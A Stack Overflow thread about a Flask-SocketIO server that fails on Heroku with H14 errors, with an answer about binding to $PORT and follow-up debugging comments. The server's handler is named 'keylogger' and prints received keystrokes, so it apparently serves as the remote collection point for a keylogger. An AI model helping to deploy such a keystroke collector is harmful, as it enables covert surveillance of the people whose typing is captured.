# Flask-SocketIO server deploys to Heroku but doesn't run

Tags: python, heroku, server, host, flask-socketio

I have a simple Flask-SocketIO server on Python and a SocketIO_Client which emits data to the server, where it gets printed in the console once received. It all works fine on a localhost, however when trying to host the server on Heroku it successfully deploys, but seems to not be running. I get the following error in the CLI logs:

> heroku[router]: at=error code=H14 desc="No web processes running" method=GET path="/" host=socket-server1337.herokuapp.com request_id=53e155e2-ba83-4862-84f8-b53014af539b fwd="..." dyno= connect= service= status=503 bytes= protocol=https

And when I try to connect to the server from the client I get this error:

> heroku[router]: at=error code=H14 desc="No web processes running" method=GET path="//socket.io/?EIO=3&transport=polling&t=1623103978016-0" host=socket-server1337.herokuapp.com request_id=12d0acb9-b5e2-4cf8-8815-81edec9cf525 fwd="..." dyno= connect= service= status=503 bytes= protocol=https

This is the code of my server:

```
from flask import Flask, render_template
from flask_socketio import SocketIO, emit

app = Flask(__name__)
app.config['SECRET_KEY'] = 'secret'
socketio = SocketIO(app, cors_allowed_origins="*")

@socketio.on('keylogger')
def print_keystrokes(data):
    print(data["keylogged"])


if __name__ == '__main__':
    socketio.run(app)
```

This is my Procfile:

> web: python Socket.py

I believe the problems lays in my Procfile configuration. I tried using Gunicorn with Gevent according to the flask-socketio documentation:

> gunicorn -k geventwebsocket.gunicorn.workers.GeventWebSocketWorker -w 1 Socket:app

as well as with eventlet:

> web: gunicorn --worker-class eventlet -w 1 Socket:app

However, nothing of the above worked. Any help would be well appreciated. Thanks in advance.

Answer (score 0):

The problem is that Heroku needs your application to listen on a specific network port that they pass to your in the `$PORT` environment variable.

One way to address this would be to change the bottom line of your script as follows:

```py
socketio.run(app, port=int(os.environ.get('PORT', 5000)))
```

You will also need to add an `import os` at the top of your script.

Comment: Thank you for the time you've put into answering my question. I tried it, however it doesn't seem to fix the problem. Unfortunately I still get the same H14 error.

Comment: You have to look at the log to see what other errors you have.

Comment: The only errors Heroku logs are the two I've quoted in the original question. After the server is deployed and successfully builds, I immediately get the following error: `heroku[router]: at=error code=H14 desc="No web processes running" method=GET path="/" host=socket-server1337.herokuapp.com request_id=b26dfd17-e29d-4bb8-8b32-b5202afffe25 fwd="" dyno= connect= service= status=503 bytes= protocol=https`
And upon attempting to connect from the client I get the same error but with different path being rapidly printed every few seconds (from the connection attempts).

Comment: Did you print the port number that you are passing to `socketio.run()`? That has to be equal to the value of the `$PORT` environment variable.

Comment: I tried with `socketio.run(app, print(port=int(os.environ.get('PORT', 5000))), debug=True)`, however I don't see any output on the Heroku logs apart from the H14 errors. If I try to run the program locally, the output is `None` (but I suppose it should differ if the program isn't run locally). Sorry for the late response!

Comment: You need to print on a separate line, you can't put the print inside the run function.

Comment: Thought so, but that was a desperate attempt after nothing else worked either. I tried printing it before the run function, but there was no output in the Heroku logs.

Comment: That's really not possible. What did you print exactly?

Comment: `print(int(os.environ.get('PORT', 5000)))` right before the run function.
The heroku logs output is as follows:

`2021-06-11T19:33:20.000000+00:00 app[api]: Build succeeded`

`2021-06-11T19:33:25.787768+00:00 heroku[router]: at=error code=H14 desc="No web processes running" method=GET path="/" host=socket-server1337.herokuapp.com request_id=045517c4-db05-4dbb-a6fb-e9a6272006e8 fwd="..." dyno= connect= service= status=503 bytes= protocol=https`
My Procfile is the same as in the original post:
`web: python Socket.py`, but I've also tried it with Gunicorn and Eventlet, output is the same.